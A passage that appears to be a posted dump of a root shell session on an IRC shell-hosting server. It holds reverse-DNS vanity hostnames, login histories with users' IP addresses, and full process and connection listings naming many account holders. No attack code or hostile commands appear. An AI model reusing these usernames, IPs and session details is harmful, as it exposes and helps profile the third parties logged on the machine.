+72.20.28.235 -\> your.mom.needs.a.tampon.before.she.overflo.ws.
+72.20.28.236 -\> buffer.overflo.ws.
+72.20.28.237 -\> got.hacked.by.buffer.overflo.ws.
+72.20.28.238 -\> the.toilet.overflo.ws.
+72.20.28.239 -\> i.made.the.hoover.dam.overflo.ws.
+72.20.28.240 -\> i.am.teh.antidr.ug.
+72.20.28.241 -\> irc.cheazey.net.
+72.20.28.242 -\> staff.vitalspeeds.com.
+72.20.28.243 -\> oper.idlenetworks.net.
+72.20.28.244 -\> .
+72.20.28.245 -\> .
+72.20.28.246 -\> .
+72.20.28.247 -\> .
+72.20.28.248 -\> .
+72.20.28.249 -\> .
+72.20.28.250 -\> .
+72.20.28.251 -\> .
+72.20.28.252 -\> .
+72.20.28.253 -\> cyberia.is.scaring.us.
+72.20.28.254 -\> anarchy.fuckdapolice.com.
+"
+
+
+[root@velocity:~]# last root
+
+wtmp begins Mon Jun  1 06:20:11 CDT 2009
+[root@velocity:~]# last romeo
+romeo            ttypg    188.49.118.210   Wed Jun 17 18:35 - 18:35  (00:00)
+
+wtmp begins Mon Jun  1 06:20:11 CDT 2009
+[root@velocity:~]# last pimpinjg
+pimpinjg         ttyp2    cpe-76-175-20-18 Wed Jun 24 07:29 - 07:51  (00:22)
+pimpinjg         ttyp2    cpe-76-175-20-18 Wed Jun 24 05:47 - 06:44  (00:56)
+pimpinjg         ttyp3    cpe-76-175-20-18 Wed Jun 24 05:41 - 05:46  (00:05)
+pimpinjg         ttyp3    cpe-76-175-20-18 Wed Jun 24 05:40 - 05:41  (00:00)
+pimpinjg         ttyp1    cpe-76-175-20-18 Wed Jun 24 05:30 - 05:41  (00:10)
+pimpinjg         ttyp1    cpe-76-175-20-18 Wed Jun 24 04:32 - 04:35  (00:02)
+pimpinjg         ttyp3    cpe-76-175-20-18 Tue Jun 23 20:54 - 20:54  (00:00)
+pimpinjg         ttypf    cpe-76-175-20-18 Tue Jun 23 08:51 - 08:51  (00:00)
+pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 08:47 - 20:53  (12:06)
+pimpinjg         ttypf    cpe-76-175-20-18 Tue Jun 23 08:37 - 08:42  (00:05)
+pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 08:37 - 08:43  (00:06)
+pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 08:36 - 08:36  (00:00)
+pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 08:36 - 08:36  (00:00)
+pimpinjg         ttypf    cpe-76-175-20-18 Tue Jun 23 07:19 - 08:32  (01:12)
+pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 07:15 - 08:36  (01:20)
+pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 07:12 - 07:13  (00:01)
+pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 07:11 - 07:12  (00:00)
+pimpinjg         ttypf    cpe-76-175-20-18 Tue Jun 23 05:20 - 05:20  (00:00)
+pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 04:59 - 07:10  (02:10)
+pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 03:43 - 04:25  (00:42)
+pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 03:10 - 03:10  (00:00)
+pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 02:52 - 02:59  (00:07)
+pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 02:37 - 02:38  (00:01)
+pimpinjg         ttypf    cpe-76-175-20-18 Tue Jun 23 01:26 - 01:28  (00:01)
+pimpinjg         ttypf    cpe-76-175-20-18 Tue Jun 23 01:16 - 01:17  (00:01)
+pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 01:15 - 01:43  (00:28)
+pimpinjg         ttypf    cpe-76-175-20-18 Tue Jun 23 01:11 - 01:14  (00:02)
+pimpinjg         ttypf    cpe-76-175-20-18 Tue Jun 23 01:02 - 01:07  (00:04)
+pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 00:45 - 01:14  (00:28)
+pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 21:14 - 22:05  (00:50)
+pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 21:07 - 21:14  (00:07)
+pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 19:23 - 19:54  (00:31)
+pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 18:36 - 18:36  (00:00)
+pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 17:40 - 18:24  (00:43)
+pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 17:12 - 17:37  (00:24)
+pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 09:20 - 09:21  (00:01)
+pimpinjg         ttype    cpe-76-175-20-18 Mon Jun 22 08:45 - 09:19  (00:33)
+pimpinjg         ttype    cpe-76-175-20-18 Mon Jun 22 08:37 - 08:40  (00:02)
+pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 08:30 - 08:49  (00:19)
+pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 08:20 - 08:26  (00:05)
+pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 08:17 - 08:18  (00:01)
+pimpinjg         ttype    cpe-76-175-20-18 Mon Jun 22 08:03 - 08:12  (00:08)
+pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 08:01 - 08:03  (00:02)
+pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 07:55 - 08:00  (00:04)
+pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 07:43 - 07:55  (00:11)
+pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 04:09 - 04:12  (00:03)
+pimpinjg         ttypf    cpe-76-175-20-18 Mon Jun 22 03:05 - 03:06  (00:00)
+pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 02:31 - 02:33  (00:01)
+pimpinjg         ttypd    cpe-76-175-20-18 Sun Jun 21 20:58 - 21:48  (00:50)
+pimpinjg         ttypd    cpe-76-175-20-18 Sun Jun 21 20:35 - 20:51  (00:16)
+pimpinjg         ttypd    cpe-76-175-20-18 Sun Jun 21 20:07 - 20:23  (00:16)
+pimpinjg         ttypd    cpe-76-175-20-18 Sun Jun 21 19:51 - 19:53  (00:01)
+pimpinjg         ttypd    cpe-76-175-20-18 Sun Jun 21 17:22 - 17:25  (00:03)
+pimpinjg         ttypd    cpe-76-175-20-18 Sun Jun 21 17:02 - 17:08  (00:06)
+pimpinjg         ttypd    cpe-76-175-20-18 Sat Jun 20 15:18 - 15:29  (00:10)
+pimpinjg         ttypd    cpe-76-175-20-18 Sat Jun 20 02:13 - 02:14  (00:00)
+pimpinjg         ttypd    76.175.20.182    Fri Jun 19 20:41 - 20:43  (00:01)
+pimpinjg         ttypf    cpe-76-175-20-18 Thu Jun 18 22:53 - 22:57  (00:04)
+pimpinjg         ttyp2    cpe-76-175-20-18 Thu Jun 18 05:11 - 05:12  (00:01)
+pimpinjg         ttyp2    cpe-76-175-20-18 Thu Jun 18 04:53 - 05:07  (00:14)
+pimpinjg         ttyp2    cpe-76-175-20-18 Thu Jun 18 04:42 - 04:42  (00:00)
+pimpinjg         ttypd    cpe-76-175-20-18 Thu Jun 18 04:28 - 04:41  (00:12)
+pimpinjg         ttypd    cpe-76-175-20-18 Thu Jun 18 02:03 - 02:44  (00:41)
+pimpinjg         ttypd    cpe-76-175-20-18 Wed Jun 17 21:10 - 21:52  (00:42)
+pimpinjg         ttype    cpe-76-175-20-18 Wed Jun 17 19:37 - 19:37  (00:00)
+pimpinjg         ttype    cpe-76-175-20-18 Wed Jun 17 19:30 - 19:37  (00:06)
+pimpinjg         ttype    cpe-76-175-20-18 Wed Jun 17 19:29 - 19:30  (00:00)
+pimpinjg         ttype    cpe-76-175-20-18 Wed Jun 17 19:27 - 19:29  (00:01)
+pimpinjg         ttype    cpe-76-175-20-18 Wed Jun 17 19:27 - 19:27  (00:00)
+pimpinjg         ttype    cpe-76-175-20-18 Wed Jun 17 19:25 - 19:26  (00:00)
+pimpinjg         ttype    cpe-76-175-20-18 Wed Jun 17 19:23 - 19:25  (00:01)
+
+wtmp begins Mon Jun  1 06:20:11 CDT 2009
+[root@velocity:~]# 
+
+[root@velocity:~]# ps -aux | grep romeo
+root       60582  0.0  0.2  5400  2036  ??  Is    3:32AM   0:00.16 sshd: romeo [priv] (sshd)
+romeo      60584  0.0  0.2  5384  2088  ??  S     3:32AM   0:01.47 sshd:  (sshd)
+romeo      51236  0.0  0.2  3268  1836  p0  Is   11:50PM   0:00.03 /usr/local/bin/bash
+romeo      51241  0.0  0.6  9296  6136  p0  S+   11:50PM   0:10.95 irssi -h absolute.ownage.net
+romeo      60586  0.0  0.2  3244  1900  p2  Is    3:32AM   0:00.04 -bash (bash)
+romeo      62761  0.0  0.1  2040  1448  p2  S+    4:25AM   0:00.04 screen -r
+
+[root@velocity:~]# lsof -i -n | grep romeo
+irssi     51241      romeo    3u  IPv4 0xca130740      0t0  TCP 72.20.28.205:61626->71.6.199.68:ircd (ESTABLISHED)
+irssi     51241      romeo    4u  IPv4 0xc58c4740      0t0  TCP 72.20.28.205:53292->66.225.223.70:ircd (ESTABLISHED)
+irssi     51241      romeo    7u  IPv4 0xca04a1d0      0t0  TCP 72.20.28.205:62094->94.102.58.212:ircd (ESTABLISHED)
+sshd      60584      romeo    3u  IPv4 0xc9e971d0      0t0  TCP 72.20.28.248:ssh->188.49.23.137:28098 (ESTABLISHED)
+[root@velocity:~]# 
+
+root@velocity:/var/run]# ps -auxwww
+USER         PID %CPU %MEM   VSZ   RSS  TT  STAT STARTED      TIME COMMAND
+root          10 83.0  0.0     0     8  ??  RL   27Jan08 534762:26.98 [idle]
+lyhne1     85085 11.3  0.3 10700  3096  ??  S    11May09 1274:26.14 /home/lyhne1/services/services
+root           0  0.0  0.0     0     0  ??  WLs  27Jan08   0:00.08 [swapper]
+root           1  0.0  0.0   772    80  ??  ILs  27Jan08  21:20.52 /sbin/init --
+root           2  0.0  0.0     0     8  ??  DL   27Jan08  38:47.98 [g_event]
+root           3  0.0  0.0     0     8  ??  DL   27Jan08 187:53.55 [g_up]
+root           4  0.0  0.0     0     8  ??  DL   27Jan08 141:20.71 [g_down]
+root           5  0.0  0.0     0     8  ??  DL   27Jan08   0:00.00 [kqueue taskq]
+root           6  0.0  0.0     0     8  ??  DL   27Jan08   0:00.01 [thread taskq]
+root           7  0.0  0.0     0     8  ??  DL   27Jan08   0:00.00 [acpi_task_0]
+root           8  0.0  0.0     0     8  ??  DL   27Jan08   0:00.00 [acpi_task_1]
+root           9  0.0  0.0     0     8  ??  DL   27Jan08   0:00.00 [acpi_task_2]
+root          11  0.0  0.0     0     8  ??  WL   27Jan08 3371:26.93 [swi4: clock sio]
+root          12  0.0  0.0     0     8  ??  WL   27Jan08   0:00.00 [swi3: vm]
+root          13  0.0  0.0     0     8  ??  WL   27Jan08 6365:16.77 [swi1: net]
+root          14  0.0  0.0     0     8  ??  DL   27Jan08 557:44.26 [yarrow]
+root          15  0.0  0.0     0     8  ??  WL   27Jan08   0:00.00 [swi6: task queue]
+root          16  0.0  0.0     0     8  ??  WL   27Jan08   0:00.01 [swi6: Giant taskq]
+root          17  0.0  0.0     0     8  ??  WL   27Jan08   0:00.00 [swi5: +]
+root          18  0.0  0.0     0     8  ??  WL   27Jan08   0:00.00 [swi2: cambio]
+root          19  0.0  0.0     0     8  ??  WL   27Jan08   0:00.00 [irq9: acpi0]
+root          20  0.0  0.0     0     8  ??  WL   27Jan08 5058:47.37 [irq16: bge0]
+root          21  0.0  0.0     0     8  ??  WL   27Jan08   0:00.00 [irq21: uhci0 ehci0]
+root          22  0.0  0.0     0     8  ??  DL   27Jan08   0:02.22 [usb0]
+root          23  0.0  0.0     0     8  ??  DL   27Jan08   0:00.00 [usbtask]
+root          24  0.0  0.0     0     8  ??  WL   27Jan08   0:00.00 [irq22: uhci1]
+root          25  0.0  0.0     0     8  ??  DL   27Jan08   0:02.68 [usb1]
+root          26  0.0  0.0     0     8  ??  WL   27Jan08   0:00.00 [irq18: uhci2]
+root          27  0.0  0.0     0     8  ??  DL   27Jan08   0:01.99 [usb2]
+root          28  0.0  0.0     0     8  ??  WL   27Jan08   0:00.00 [irq23: uhci3]
+root          29  0.0  0.0     0     8  ??  DL   27Jan08   0:02.09 [usb3]
+root          30  0.0  0.0     0     8  ??  DL   27Jan08   0:02.34 [usb4]
+root          31  0.0  0.0     0     8  ??  WL   27Jan08   0:00.00 [irq14: ata0]
+root          32  0.0  0.0     0     8  ??  WL   27Jan08   0:00.00 [irq15: ata1]
+root          33  0.0  0.0     0     8  ??  WL   27Jan08 149:12.28 [irq20: atapci1]
+root          34  0.0  0.0     0     8  ??  WL   27Jan08   0:00.60 [irq1: atkbd0]
+root          35  0.0  0.0     0     8  ??  WL   27Jan08   0:00.00 [swi0: sio]
+root          36  0.0  0.0     0     8  ??  DL   27Jan08  15:56.90 [pagedaemon]
+root          37  0.0  0.0     0     8  ??  DL   27Jan08   0:01.89 [vmdaemon]
+root          38  0.0  0.0     0     8  ??  DL   27Jan08  98:08.61 [pagezero]
+root          39  0.0  0.0     0     8  ??  DL   27Jan08   3:59.11 [bufdaemon]
+root          40  0.0  0.0     0     8  ??  DL   27Jan08 519:04.35 [syncer]
+root          41  0.0  0.0     0     8  ??  DL   27Jan08   5:03.46 [vnlru]
+root          42  0.0  0.0     0     8  ??  DL   27Jan08  56:44.12 [softdepflush]
+root          43  0.0  0.0     0     8  ??  DL   27Jan08  96:57.63 [schedcpu]
+root         753  0.0  0.0   528     0  ??  IWs  -         0:00.00 /sbin/devd
+root         808  0.0  0.0  1376   368  ??  Ss   27Jan08  29:30.11 /usr/sbin/syslogd -s
+root         905  0.0  0.0  1288   108  ??  Ss   27Jan08   0:38.65 /usr/sbin/usbd
+nobody       921  0.0  0.1  2368   644  ??  Ss   27Jan08  10:21.51 proftpd: (accepting connections) (proftpd)
+root         973  0.0  0.0  1444   344  ??  Is   27Jan08   9:25.16 /usr/sbin/cron -s
+nodex       1211  0.0  0.1  4892   620  ??  S    27Jan08   2:16.48 ./services
+nodex       1219  0.0  0.1  3408   796  ??  S    27Jan08  20:22.77 ircd: irc.nodexirc.net (ircd)
+crazyl      1230  0.0  0.2  3484  1896  ??  S    27Jan08  62:45.21 ./eggdrop ApocBot.conf (eggdrop-1.6.18)
+crazyl      1241  0.0  0.2  3952  2400  ??  S    27Jan08  93:52.56 ./eggdrop Hibben.conf (eggdrop-1.6.18)
+crazyl      1248  0.0  0.2  4128  2352  ??  S    27Jan08  96:56.14 ./eggdrop CLBot.conf (eggdrop-1.6.18)
+root        2937  0.0  0.0  1408   204  ??  Is   27Jan08   2:15.57 oidentd
+ioplex      4479  0.0  0.2  5228  1608  ??  Ss   10Jun09   2:15.27 ./psybnc conf
+roodyk      7496  0.0  0.0  4512   496  ??  Ss   26Apr09   0:34.85 ./sbnc
+roodyk      7497  0.0  0.2  7760  2416  ??  S    26Apr09   2:06.67 ./sbnc --rpc-child
+bluewish    8293  0.0  0.1  1580   524  ??  Ss   31Mar09   3:18.90 ./energymech
+skypilot   11073  0.0  0.0  1508     0  ??  IWs  -         0:00.00 ./bnc
+ste        12145  0.0  0.2  3936  2368  ??  Ss   15Jun09   6:32.39 /usr/home/ste/bsd mob
+ste        12182  0.0  0.2  4960  2556  ??  Ss   15Jun09   7:31.60 /usr/home/ste/bsd player
+lordy      12679  0.0  0.0     0     0  ??  Z    13Jun09   0:00.00 
+lordy      12680  0.0  0.0     0     0  ??  Z    13Jun09   0:00.00 
+lordy      12682  0.0  0.0     0     0  ??  Z    13Jun09   0:00.00 
+lordy      12683  0.0  0.0     0     0  ??  Z    13Jun09   0:00.00 
+lordy      12684  0.0  0.0     0     0  ??  Z    13Jun09   0:00.00 
+lordy      12685  0.0  0.0     0     0  ??  Z    13Jun09   0:00.01 
+lordy      12686  0.0  0.0     0     0  ??  Z    13Jun09   0:00.01 
+lordy      12687  0.0  0.0     0     0  ??  Z    13Jun09   0:00.00 
+lordy      12689  0.0  0.0     0     0  ??  Z    13Jun09   0:00.00 
+lordy      12690  0.0  0.0     0     0  ??  Z    13Jun09   0:00.00 
+lordy      12691  0.0  0.0     0     0  ??  Z    13Jun09   0:00.00 
+lordy      12692  0.0  0.0     0     0  ??  Z    13Jun09   0:00.00 
+lordy      12695  0.0  0.0     0     0  ??  Z    13Jun09   0:00.00 
+lordy      12696  0.0  0.0     0     0  ??  Z    13Jun09   0:00.00 
+lordy      12697  0.0  0.0     0     0  ??  Z    13Jun09   0:00.01 
+lordy      12701  0.0  0.0     0     0  ??  Z    13Jun09   0:00.01 
+crrj13     15843  0.0  0.3  5508  2696  ??  S    28Apr09   3:57.42 ircd: lambda.bitsjointirc.net (ircd)
+daali      18199  0.0  0.0  2888     0  ??  IWs  -         0:00.00 ./bnc bnc.conf
+daali      18620  0.0  0.0  2716     0  ??  IWs  -         0:00.00 ./bnc bnc.conf
+scouse     19191  0.0  0.1  2956  1152  ??  S    27Nov08 825:22.21 ircd: irc.toughsociety.com (ircd)
+scouse     19383  0.0  0.1  7296   676  ??  S    27Nov08   0:46.99 ./services -logchan
+root       21928  0.0  0.2  5476  2020  ??  Is    9:10PM   0:00.07 sshd:  (sshd)
+root       22109  0.0  0.2  5344  2024  ??  Ss    9:15PM   0:00.09 sshd:  (sshd)
+blotch     22806  0.0  1.2 18352 12200  ??  Ss   10Dec08 4616:08.79 /usr/home/blotch/inspircd/bin/inspircd
+shoes      25037  0.0  0.2  5092  2132  ??  S    23Sep08 156:12.96 ./eggdrop ./bot.conf (eggdrop-1.6.19)
+shoes      25039  0.0  0.2  5152  2160  ??  S    23Sep08 153:40.81 ./eggdrop ./bot.conf (eggdrop-1.6.19)
+crazyl     25232  0.0  0.3  4344  2676  ??  S    31Jan09  28:34.31 ./eggdrop cx4storm.conf (eggdrop-1.6.18)
+narcissu   26686  0.0  0.1  4740  1452  ??  S    11Mar08  22:41.05 ircd: beta.pseud0.net (ircd)
+smash      26960  0.0  0.2 12128  2032  ??  Ss    9Nov08 147:51.60 /usr/home/smash/wraith/wraith iridium
+blake96    27902  0.0  0.2  3344  1924  ??  S     8Nov08  23:08.58 ./eggdrop eggdrop.conf (eggdrop-1.6.19)
+lyhne1     29482  0.0  0.1  1448   700  ??  S     2Jan09 134:02.80 ./bopm
+chrirc     33440  0.0  0.1  3520   776  ??  S    12Jun08  15:34.94 ircd: irc.ChristianIRC.net (ircd)
+yaquis     43784  0.0  0.1  1520   736  ??  Ss   12Jun09   0:02.72 ./bnc
+devil      43953  0.0  0.1  1592   620  ??  Ss    6Jul08  75:48.71 ./energymech
+smash      44333  0.0  0.2  3936  1920  ??  Ss    5May09  22:54.47 /usr/home/smash/wraith/wraith fpck
+ltootle    48390  0.0  0.2  7040  2456  ??  S    26Jun08 935:23.47 ircd: RedWolf.Wolfpac.Org (ircd)
+root       51233  0.0  0.2  2268  1784  ??  Ss   11:50PM   0:07.93 screen
+lordy      51655  0.0  0.0     0     0  ??  Z     8Jun09   0:00.00 
+lordy      51656  0.0  0.0     0     0  ??  Z     8Jun09   0:00.01 
+lordy      51657  0.0  0.0     0     0  ??  Z     8Jun09   0:00.00 
+lordy      51658  0.0  0.0     0     0  ??  Z     8Jun09   0:00.01 
+lordy      51659  0.0  0.0     0     0  ??  Z     8Jun09   0:00.00 
+lordy      51660  0.0  0.0     0     0  ??  Z     8Jun09   0:00.00 
+lordy      51661  0.0  0.0     0     0  ??  Z     8Jun09   0:00.00 
+lordy      51662  0.0  0.0     0     0  ??  Z     8Jun09   0:00.00 
+lordy      51663  0.0  0.0     0     0  ??  Z     8Jun09   0:00.00 
+lordy      51664  0.0  0.0     0     0  ??  Z     8Jun09   0:00.00 
+lordy      51665  0.0  0.0     0     0  ??  Z     8Jun09   0:00.00 
+lordy      51668  0.0  0.0     0     0  ??  Z     8Jun09   0:00.00 
+lordy      51669  0.0  0.0     0     0  ??  Z     8Jun09   0:00.00 
+y2j        53333  0.0  0.2  3296  1680  ??  S    22May09   4:05.27 ./psybnc
+y2j        53335  0.0  0.3  4796  2992  ??  S    22May09   6:11.27 ./eggdrop IcEMaN.conf (eggdrop-1.6.17)
+y2j        53336  0.0  0.4  6032  3608  ??  S    22May09   7:22.14 ./eggdrop SioN.conf (eggdrop-1.6.17)
+ltootle    54810  0.0  0.1  8336   992  ??  S    26Jun08  24:35.00 ./services
+bruhaha    59704  0.0  0.0  1528     0  ??  IWs  -         0:00.00 ./bnc
+root       60582  0.0  0.2  5400  2036  ??  Is    3:32AM   0:00.60 sshd: romeo [priv] (sshd)
+romeo      60584  0.0  0.2  5384  2088  ??  S     3:32AM   0:09.86 sshd:  (sshd)
+root       63283  0.0  0.2  2332  1828  ??  Is   Wed10PM   0:01.12 screen
+root       64492  0.0  0.1  2772   604  ??  Is   17Jun09   4:12.85 /usr/sbin/sshd
+bruhaha    67858  0.0  0.1  1544   616  ??  Ss   23Aug08  17:43.63 ./bnc
+bruhaha    70843  0.0  0.0  1516     0  ??  IWs  -         0:00.00 ./bnc
+dealer     78536  0.0  0.1  8176  1316  ??  S    14Mar09 220:01.22 php dealbot.php
+own3d      82309  0.0  0.1  2820   728  ??  Is   15Oct08   3:35.17 ./sbnc
+lymelyte   88242  0.0  0.2  7720  2084  ??  Ss   29Mar09   4:33.70 ./epona
+poolboy    89012  0.0  0.4  5752  3984  ??  S     8Feb09 320:59.08 ./eggdrop CAP0.conf (eggdrop-1.6.17)
+redrum     91676  0.0  0.0  1280     0  ??  IW   -         0:00.00 tail -f /home/redrum/Unreal3.2/ircd.log
+redrum     91678  0.0  0.0  1280     0  ??  IW   -         0:00.00 tail -f /home/redrum/Unreal3.2/ircd.log
+redrum     91682  0.0  0.0  1280     0  ??  IW   -         0:00.00 tail -f /home/redrum/Unreal3.2/ircd.log
+root       92538  0.0  0.0     0     8  ??  DL   Thu08AM   0:00.08 [accounting]
+root       93821  0.0  0.1  1436   844  ??  Is   Thu08AM   0:00.00 inetd
+root       98040  0.0  0.2  5368  2016  ??  Is    4:35PM   0:00.04 sshd: ioplex [priv] (sshd)
+ioplex     98044  0.0  0.4  7364  4052  ??  I     4:35PM   0:02.03 sshd: ioplex (sshd)
+crazie     98542  0.0  0.4  9732  3884  ??  S    19May09  36:58.07 ./l
+crazie     98871  0.0  0.3  9236  3152  ??  S    19May09  13:26.08 ./mb2
+crazie     99303  0.0  0.2  7512  2324  ??  S    19May09   7:43.22 ./mb6
+root        1033  0.0  0.0  1344     0  v0  IWs+ -         0:00.00 /usr/libexec/getty Pc ttyv0
+root        1034  0.0  0.0  1344     0  v1  IWs+ -         0:00.00 /usr/libexec/getty Pc ttyv1
+root        1035  0.0  0.0  1344     0  v2  IWs+ -         0:00.00 /usr/libexec/getty Pc ttyv2
+root        1036  0.0  0.0  1344     0  v3  IWs+ -         0:00.00 /usr/libexec/getty Pc ttyv3
+root        1037  0.0  0.0  1344     0  v4  IWs+ -         0:00.00 /usr/libexec/getty Pc ttyv4
+root        1038  0.0  0.0  1344     0  v5  IWs+ -         0:00.00 /usr/libexec/getty Pc ttyv5
+root        1039  0.0  0.0  1344     0  v6  IWs+ -         0:00.00 /usr/libexec/getty Pc ttyv6
+root        1040  0.0  0.0  1344     0  v7  IWs+ -         0:00.00 /usr/libexec/getty Pc ttyv7
+darien9     2420  0.0  0.1 114060  1208  p0- S    16Mar08 799:19.15 ./psybnc
+manboo      9260  0.0  0.1  3676   924  p0- S    22Apr08  20:51.79 ircd: irc.thederka.com (ircd)
+manboo     11135  0.0  0.1  4288   620  p0- S    22Apr08   4:36.07 ./services
+ac1115     21918  0.0  0.1 21512  1200  p0- S     2Jul08  15:39.60 ./psybnc
+devil      22201  0.0  0.2 21412  1712  p0- S     2Nov08  46:45.70 ./psybnc
+bpunux     27500  0.0  0.1  9476  1136  p0- S    31Oct08   9:22.64 ./psybnc
+bpunux     28911  0.0  0.1  3068   976  p0- S    31Oct08   6:58.93 ./psybnc
+tarawa     33111  0.0  0.3 29660  2640  p0- S    14Mar08 106:21.81 ./psybnc
+reznik     33517  0.0  0.1 40788  1268  p0- S    27Apr08  44:00.81 ./psybnc
+genosyde   34316  0.0  0.1  3192  1464  p0- S     5Jun08  39:10.11 ./eggdrop -m (eggdrop-1.6.18)
+chrirc     40199  0.0  0.1  4248   628  p0- S    12Jun08   3:50.57 ./services
+vamp       44090  0.0  0.2  3936  2464  p0- S    27Jan08 103:08.26 ./eggdrop guanoapes.conf (eggdrop-1.6.15)
+vamp       44142  0.0  0.2  8352  2400  p0- S    27Jan08 102:58.38 ./eggdrop phante.conf (eggdrop-1.6.15)
+vamp       44170  0.0  0.2  3720  2120  p0- S    27Jan08  93:42.97 ./eggdrop bengal.conf (eggdrop-1.6.15)
+darien9    46897  0.0  0.1 84316  1384  p0- S     1Apr08 1518:35.73 ./psybnc
+romeo      51236  0.0  0.2  3268  1836  p0  Is   11:50PM   0:00.03 /usr/local/bin/bash
+romeo      51241  0.0  0.7  9932  6740  p0  S+   11:50PM   0:34.89 irssi -h absolute.ownage.net
+burnt      59824  0.0  0.3  5952  3156  p0- S    27Jan08  54:17.27 ircd: wasted.ufc-pride.org (ircd)
+burnt      59989  0.0  0.1  9012  1108  p0- S    27Jan08   5:52.73 ./services
+sharpie    63388  0.0  0.2  3908  2172  p0- S    27Jan08  61:39.10 ./eggdrop egg (eggdrop-1.6.15)
+daali      79885  0.0  0.3  5032  2656  p0- S    28Jan08  55:47.60 ./eggdrop (eggdrop-1.6.18)
+darkevil   84286  0.0  0.1  3868   704  p0- S    25Mar08  17:04.32 ircd: irc.darkquest.org (ircd)
+sharpie    95504  0.0  0.2  3812  2140  p0- S    25Apr08  53:07.90 ./eggdrop sun (eggdrop-1.6.15)
+sharpie    95593  0.0  0.2  3708  2148  p0- S    25Apr08  51:59.24 ./eggdrop spank (eggdrop-1.6.15)
+root       22120  0.0  0.2  3220  1888  p1  Ss    9:16PM   0:00.03 -bash (bash)
+root       22827  0.0  0.1  1648   980  p1  R+    9:32PM   0:00.00 ps -auxwww
+dark        3869  0.0  0.2 31228  2488  p2- S    22Apr09  11:35.44 ./psybnc
+romeo       4433  0.0  0.1  2040  1448  p2  S+    7:09PM   0:00.04 screen -r
+mooo       10652  0.0  0.2 41984  2284  p2- S    21May09  11:44.09 ./psybnc
+tlm        11616  0.0  0.2 27520  1788  p2- S    26Apr09   4:20.44 ./psybnc
+vamp       18167  0.0  0.1 29116  1320  p2- S     5Apr08  23:34.92 ./psybnc
+wchan21    29220  0.0  0.2 10628  2024  p2- S    30Apr09   7:46.46 ./psybnc psybnc.conf
+mimik0r    29613  0.0  0.2  5176  2248  p2- S    30May09   3:56.60 ./eggdrop eggdrop.conf (eggdrop-1.6.19)
+psycoz     29853  0.0  0.1  3248  1404  p2- S     7Jun09   1:13.18 ./psybnc
+zeepysea   33510  0.0  0.1  1424   620  p2- S    20Mar08 291:26.11 ./bopm
+lordy      33773  0.0  0.1  6120  1468  p2- S    30May09 440:58.20 ./bot
+lordy      33777  0.0  0.1  3848   944  p2- S    30May09 360:11.97 ./bot
+lordy      33783  0.0  0.2  7468  1684  p2- S    30May09 444:16.39 ./bot
+lordy      33807  0.0  0.1  4696  1024  p2- S    30May09 439:42.64 ./bot
+lordy      33811  0.0  0.1  5784  1088  p2- S    30May09 443:07.55 ./bot
+narcissu   34556  0.0  0.1 136368   564  p2- S    20Feb08  38:20.52 ./psybnc
+cmm        37284  0.0  0.2 22500  1724  p2- S    13Apr09   6:35.61 ./psybncD
+devil      43929  0.0  0.2 15176  2316  p2- S    22May09   8:40.13 sshd
+yaquis     47275  0.0  0.2  2976  1680  p2- S     6Jun09   1:51.67 ./eggdrop -m simple.conf (eggdrop-1.6.15)
+chaos1     48442  0.0  0.3  3400  2812  p2- S    10:44PM   0:07.40 ircd: irc.sonicanime.net (ircd)
+chaos1     48822  0.0  0.7  8296  7116  p2- S    10:52PM   0:01.09 /home/chaos1/core/anope/host/services
+chaos1     49843  0.0  0.6  7060  6444  p2- S    11:19PM   1:36.17 /home/chaos1/core/eggdrop/eggdrop ./run.eggdrop (eggdrop-1.6.19)
+tarawa     51960  0.0  3.6 82452 36732  p2- S    17May09  10:36.81 ./eggdrop Asurada.conf (eggdrop-1.6.19)
+yaquis     52945  0.0  0.1  1432   960  p2- S    12:31AM   0:48.93 ./bopm
+mlh        54757  0.0  0.2  3620  2108  p2- S     8Apr09   8:18.74 ./eggdrop a.conf (eggdrop-1.6.19)
+safety     59083  0.0  0.2  3316  1752  p2- S    22May09   1:49.86 ./psybnc
+brosco     59827  0.0  0.2  3912  2532  p2- S     1Jun09   3:41.68 ./eggdrop iphoney.conf (eggdrop-1.6.19)
+romeo      60586  0.0  0.2  3244  1900  p2  Is    3:32AM   0:00.05 -bash (bash)
+cpu        60695  0.0  0.2 12308  1880  p2- S    22May09   2:16.63 ./gramicci
+bollox     61265  0.0  0.2  3556  2068  p2- S     1May09   5:46.65 ./eggdrop Prolapse.conf (eggdrop-1.6.18)
+dealer     74736  0.0  0.2  3180  1636  p2- S     8Apr09   6:58.53 ./eggdrop eggdrop.conf (eggdrop-1.6.19)
+ircjaymz   75110  0.0  0.1 10012  1220  p2- S    18Mar08  24:56.65 ircd: ircdt.com (ircd)
+redrum     80211  0.0  0.6  9244  6144  p2- S     9Jun09   9:12.34 ./eggdrop (eggdrop-1.6.19)
+redrum     80260  0.0  0.6  6868  5764  p2- S     9Jun09   2:38.87 ./eggdrop ald.conf (eggdrop-1.6.19)
